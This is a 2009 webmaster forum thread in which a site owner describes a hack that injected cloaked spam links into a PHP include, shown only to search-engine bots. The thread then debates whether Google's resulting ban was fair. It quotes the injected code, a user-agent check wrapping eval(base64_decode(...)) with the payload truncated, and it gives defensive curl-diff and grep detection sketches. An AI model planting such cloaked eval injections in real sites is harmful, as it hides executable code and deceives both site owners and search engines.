Forum Moderators: Robert Charlton & goodroi
Checked the PHP files and could not find those links at first (you need to use a Googlebot user agent to see them), but after careful investigation it turned out that a clever PHP injection had been made into one of the files included from index.php, with the file's datestamp kept intact.
Here is the PHP:
if (strstr($_SERVER['HTTP_USER_AGENT'], 'Mybot') || strstr($_SERVER['HTTP_USER_AGENT'], 'Googlebot') || strstr($_SERVER['HTTP_USER_AGENT'], 'msn') || strstr($_SERVER['HTTP_USER_AGENT'], 'Slurp')) {
eval(base64_decode('ZnVuY3Rpb24...QoKTsK'));
}
When decoded, it shows that the spam links are pulled from an external URL that I won't post here (you can decode it yourself).
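Since the injection above only serves the spam links to bot user agents, the simplest way to spot this kind of cloaking from the outside is to fetch the same page twice, once as a normal browser and once claiming to be Googlebot, and diff the results. A minimal sketch (the URL, file names and helper names are placeholders, not anything from the original post):

```shell
#!/bin/sh
# Sketch: reveal cloaked content by comparing what a browser sees
# with what Googlebot sees. example.com is a placeholder URL.

fetch_both() {
    url="$1"
    curl -s -A "Mozilla/5.0 (Windows NT 5.1)" "$url" > as_browser.html
    curl -s -A "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" \
         "$url" > as_googlebot.html
}

# Print lines served ONLY to the bot; any <a href=...> lines here
# are cloaked links that normal visitors never see.
cloaked_only() {
    diff "$1" "$2" | sed -n 's/^> //p'
}

# Usage (commented out so the sketch is inert):
# fetch_both "http://example.com/"
# cloaked_only as_browser.html as_googlebot.html
```

An empty diff does not prove the site is clean (the hack could key off IP ranges rather than user agents), but it would have caught the exact injection quoted above.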
Now what's really odd is that Google banned the whole site because of these clearly hacked links. That seems a rather harsh reaction given that they are well aware such hacks are commonplace now; the more reasonable response would have been to warn the user and devalue the outgoing links.
[edited by: tedster at 7:56 pm (utc) on Jan. 9, 2009]
[edit reason] obscure the spammer link code [/edit]
This attitude will land them in court sooner rather than later, and they will lose.
Wasn't there a company that sued Google for banning them because of their black hat practice and lost? It seems there's a precedent that Google doesn't owe anyone being listed or well ranked, especially if they apply their logic (banning on cloaking detection) to everyone without discrimination. You assume Google knows it's not your fault. How can they know it's not deliberate cloaking? And should they, really? Just like ignorance of the law is never a defense, sometimes irresponsibility is just as bad as malice and must be treated the same. Either way, in the end, Google is a private company, not the government, they're allowed a lot more leeway with regards to how they conduct their business.
Wasn't there a company that sued Google for banning them because of their black hat practice and lost?
Yes, but that was a very different case - they would not have been able to prove in court that their site was hacked, whereas in my case I could do so easily, which puts it in a completely different ballpark.
Also bear in mind that Google is much more powerful now than it was back then - in the UK around 90% of searches are done on Google, which effectively makes them a monopoly here. They may well be a private company, but they can't abuse their monopolistic status, which in my view they do with such unjustified bans.
For me this just shows how bad it is to have monopolies - hackers, in my view, have less potential to destroy an online business than Google does, and that ain't right.
Say they had detected one instance of hacking (cloaked links, for example) but had not detected a drive-by download. They served the page despite the fact it was hacked, because they made a judgement that it would not maliciously affect the searcher. Thousands of people get hit. Further, how much resource would it take to verify that every hacked site is in fact clean? How often would you have to spider to be happy it remained clean?
No, I think once a hack is detected, Google must assume the worst and de-list until the owner has rectified the problem.
Communicating the fact of de-listing via WMT would be helpful, and may even constitute a duty of care given the fact that for many, Google referals are the life-blood of their company.
I get that you're upset about your site being out of action for a day, but here's how I see it:
Your neighbour (Google) sees someone trying to climb in through your window and calls the police (bans you). It turns out it's your son, who has forgotten his keys (not actually dangerous, but it could have been). You have to go and get your son out of jail (submit a re-inclusion request, etc). Do you stand and scream and shout at your neighbour because they *should* have realised it was your son, or do you thank them profusely for their vigilance and hope they do the same next time, since it could prevent you from being robbed (your customers getting malware and no longer being customers) in the future?
Yes, this time there was no risk to your site's users, but why should Google take that risk? Surely it's better to ban *all* hacked sites than to risk one malware-ridden one getting through?
I think G would be open to more lawsuits if they served results from domains they knew to be hacked.
Please double-check my words - in my case the site was hacked to insert invisible cloaked links designed to boost rankings. Users never saw them, which is why I only noticed when a user told me the site appeared to be banned in Google.
so how long do you think Google should have left your site out there before they banned it?
I think they should not ban sites for such links at all - perhaps devalue the outgoing links and send a message to the site owner. I repeat yet again: a hacked site does not necessarily cause issues for the end users who visit it - in this case the only party bothered was Google, as such hidden links cause problems for link-based ranking.
It may be speculated that if a site is hacked this way, it will be hacked next time to distribute malicious software that may endanger end users. Indeed, it can also be speculated that some minor criminal may turn into a murderer and thus should be locked up for life straight away: this does not happen in the real world because there are laws that demand proportionality. Google is completely out of order here, as their actions are completely disproportionate.
Think about it - for years it has been speculated that backlinks from bad neighbourhoods could be bad for you: search engines did not want to ban sites outright because that would have led to deliberate black hat action to hurt competitors. Now we know for a fact that Google can ban a site if a handful of outgoing links are put on it via the hacks that go on all the time. If they act like this, surely this will become a great black hat attack on the competition, especially against smaller sites that can't afford good security? Think about it - by defending Google in this case you are exposing yourself to such action in the future. And don't think you will have perfect security - nobody does.
I credit Google with unbanning the site quickly, however. What they should have done was devalue the links, warn via email and maybe give 30 days to fix it. If a site is totally new, then ban it outright, but established sites known to be good should not be treated like this.
Oh, just noticed it's a homepage feature discussion, my first! :)
Didn't intend to appear bitter in this thread - luckily my traffic is heavily diversified and search engines don't actually play an important role, however it is embarrassing to be out of the index where everyone expects you to be.
[edited by: Lord_Majestic at 2:35 pm (utc) on Jan. 19, 2009]
How does Google know FOR SURE that there wasn't another hack there that went undetected?
How much resource should they devote to verifying that the hack was for SEO and not malicious?
How much resource should they devote to checking against a known list of hacks that ARE malicious?
Should they develop an in-house list of vulnerabilities? Or pay an AV company? Would it be licensed? Per search, per server, per server farm?
Say the site is on a 1 week spider schedule. Should G be confident no additional defacements or malware gets executed between spiders?
Right, hypothetical time.
Google has spent thousands or perhaps millions of dollars checking sites that have been hacked, and as far as the latest definitions say, users should be fine. But wait - an unknown exploit gets through. Someone sues. Google admits they KNOW the site is hacked, that they COULD de-list, but made a NEGLIGENT JUDGEMENT to serve the page anyway.
Think how quickly you acted once you knew you were dropped. Many would do the same. Many of those would NOT act so quickly if they were not taking the hit. They would have no incentive.
So fine, in your case the result was disproportionate. However, I contend that the resources required to ascertain proportionality are disproportionate to their duty of care to you.
Added- However, I think posting a note in WMT is something that should be actioned as part of an implied Duty of Care
[edited by: Shaddows at 3:13 pm (utc) on Jan. 19, 2009]
How does Google know FOR SURE that there wasn't another hack there that went undetected?
It doesn't, so it should not ban the site.
In my view it is not their job to police these things - it is a matter for users, AV companies and hosting providers: Google should probably mark a site as potentially dangerous, as they do now for those they are sure are infected.
Google admits they KNOW the site is hacked, that they COULD de-list, but made a NEGLIGENT JUDGEMENT to serve the page anyway.
Grrr, how many times must I repeat that this hack was harmless to end users? The hack was to insert cloaked links (not shown to normal users) - Google's detection message was very explicit about the cloaked links, so end users were never in danger at any time. It can be speculated that since one hack was possible, another one might have put infected stuff on computers - so what.
However, I contend that the resources required to ascertain proportionality are disproportionate to their duty of care to you.
They have no duty of care to speak of - they essentially (like any other site) disclaim any responsibility for the search results they show.
This thread is not about protection of users - it is about protection of the link graph algorithms used by Google. They are being very harsh about it now (banning rather than devaluing links), and I think they are making a mistake that will be very costly to them in the end, but probably fatal to those who get hit by it before the courts finally rule on this matter.
I would say that this thread points out the need for anyone that maintains a site dependent upon Google traffic to have a Google Webmaster Tools account and check the message center there daily.
I am in full agreement with that!
I think soon more people will start doing that, and Google will start warning first - that would be a smarter thing for them to do than what they do now. Perhaps with such bans they want to drive faster adoption of GWT?
I was wondering, was that a solicited message?
No.
The exact chronology is this:
1) I am alerted to the fact that the site: command in Google does not show any pages for my site
2) I check GWT, where I had verified that site a long time ago - it's missing for some reason (maybe I deleted it, but I'm not sure)
3) I re-verify it and suddenly see a message from Google telling me about the temporary removal and giving details (which were handy): cloaked links, with a sample of the anchor text they found
4) I investigate and find this clever hack that was doing the cloaking
5) I fix things and ask for reinclusion - this produced a new message saying they had received the request
6) The site comes back within 2 business days, no additional messages.
The first message was not a warning - its datestamp was the same as when the site was removed.
So, one should register sites in GWT and check it often - I think perhaps that's what Google wants to push people towards with these strong-arm tactics.
the more reasonable response would have been to warn the user and devalue the outgoing links.
I'm ignorant... How would they do it? Does Google maintain such an email database of webmasters?
For webmasters, they should post a message through Google Webmaster Tools, and possibly send an email to the address registered on that account.
Finally, to stop the hack being beneficial to the hacker, the cloaked links become (effectively) nofollowed.
So, for the 3 parties affected by the hack, the outcome would be
Webmaster - no adverse effect, but warned of compromise
User (searcher) - Warned of hack but still able to find page
Hacker - No positive effect whatsoever (apart from possible notoriety)
I believe this is Lord Majestic's preferred solution.
I agree in principle, except that I think the check for malicious activity is too onerous and therefore it is acceptable to drop the domain. I can see it both ways however, and am happy to disagree.
[edited by: Shaddows at 2:09 pm (utc) on Jan. 20, 2009]
I am currently working on a "paper" map of all the input points to my site where users can upload content - these are your weak points. Then I will double-check that I am safe from SQL injections there, and also double-check that I am safe from HTML injections (spamming) and file injections (you don't want them to somehow upload a whole new page).
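Alongside auditing the input points, it's worth scanning the files already on disk, since the thread's hack kept the file datestamp intact - meaning a "recently modified files" check would have missed it, while a content scan would not. A rough sketch (the docroot path is a placeholder, and this assumes GNU grep; expect occasional false positives, since some legitimate packages also call base64_decode):

```shell
#!/bin/sh
# Sketch: find PHP files containing the eval(base64_decode(...)) pattern
# used by this kind of injection. Content-based, so it still works when
# the attacker has reset file timestamps.

scan_for_injections() {
    # -r recurse, -l list matching files only, -E extended regexp;
    # allow optional whitespace between eval, "(" and base64_decode
    grep -rlE --include='*.php' \
        'eval[[:space:]]*\([[:space:]]*base64_decode' "$1"
}

# Usage (path is a placeholder):
# scan_for_injections /var/www/html
```

Any file this flags should be compared against a known-good copy from version control or a clean backup rather than edited in place.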
I just tried the lynx command, it is pretty neat.
I believe this is Lord Majestic's preferred solution.
Yes, I agree - that would be the best solution, one that won't cause more harm than necessary.
Majestic, why are you arguing so much.
I am not arguing - I am expressing my views.
No software is perfect - it is unreasonable for Google to place such a high burden on everyone only because such hacked links cause problems for their PageRank calculations. They managed to detect that the links were cloaked and hidden from user view, so they should quietly devalue such links.
Let's discuss how to prevent these hackers from getting to us.
I operate on the basis that perfect security is simply not possible without very high costs - if you use popular forum or blog software you are exposing yourself to such issues; everything has holes, it's just a matter of time.
So, given that assertion, I conclude that any action that makes things much worse than they are (like a site ban in Google) is not acceptable given their monopolistic position. You are entitled to disagree with my view; just be aware that by supporting such a Google policy you are increasing the chance that you will be on the sharp end of it sooner or later.